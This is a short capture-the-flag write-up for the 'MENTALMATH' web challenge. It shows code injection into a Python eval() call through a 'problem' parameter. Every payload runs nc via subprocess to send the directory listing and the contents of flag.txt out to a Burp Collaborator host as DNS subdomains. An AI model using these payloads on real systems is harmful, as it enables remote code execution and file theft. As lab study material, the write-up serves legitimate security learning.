Tags: python rce
Rating:
# ▼▼▼MENTALMATH(Web:262pts,132/661=20.0%)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
---
## 【Vulnerability identification】
I guessed it was calculated by `eval()`.As a result of doing various things, we succeeded in the following.
↓
problem=`__import__('subprocess').check_output("nc fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net 80",shell=True)`&answer=0
↓
DNS access came!! **python arbitrary code execution**
---
## 【Get flag】
problem=`__import__('subprocess').check_output("nc $(ls|tr -d '\n')c.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net 80",shell=True)`&answer=0
↓
The following DNS access comes
```
db.sqlite3flag.txtmanage.pymathgamementalmathrequirements.txtc.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net.
```
↓
`flag.txt`
---
problem=`__import__('subprocess').check_output("nc $(cat flag.txt|tr -cd 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')c.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net 80",shell=True)`&answer=0
↓
```
gigem14mg0od47m4tH3m4aaticsn07s3cUr1tyh3h3h3hec.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net.
```
↓
`gigem{14mg0od47m4tH3m4aaticsn07s3cUr1tyh3h3h3he}`
↓
I can't submit and it looks like something is missing.
---
Try: convert `_` to `L`. That is, `sed -e 's/%5c_/L/g'`
↓
problem=`__import__('subprocess').check_output("nc $(cat flag.txt|sed -e 's/%5c_/L/g'|tr -cd 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')c.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net 80",shell=True)`&answer=0
↓ Convert `L` to `_`
`gigem{1_4m_g0od_47_m4tH3m4aatics_n07_s3cUr1ty_h3h3h3he}`
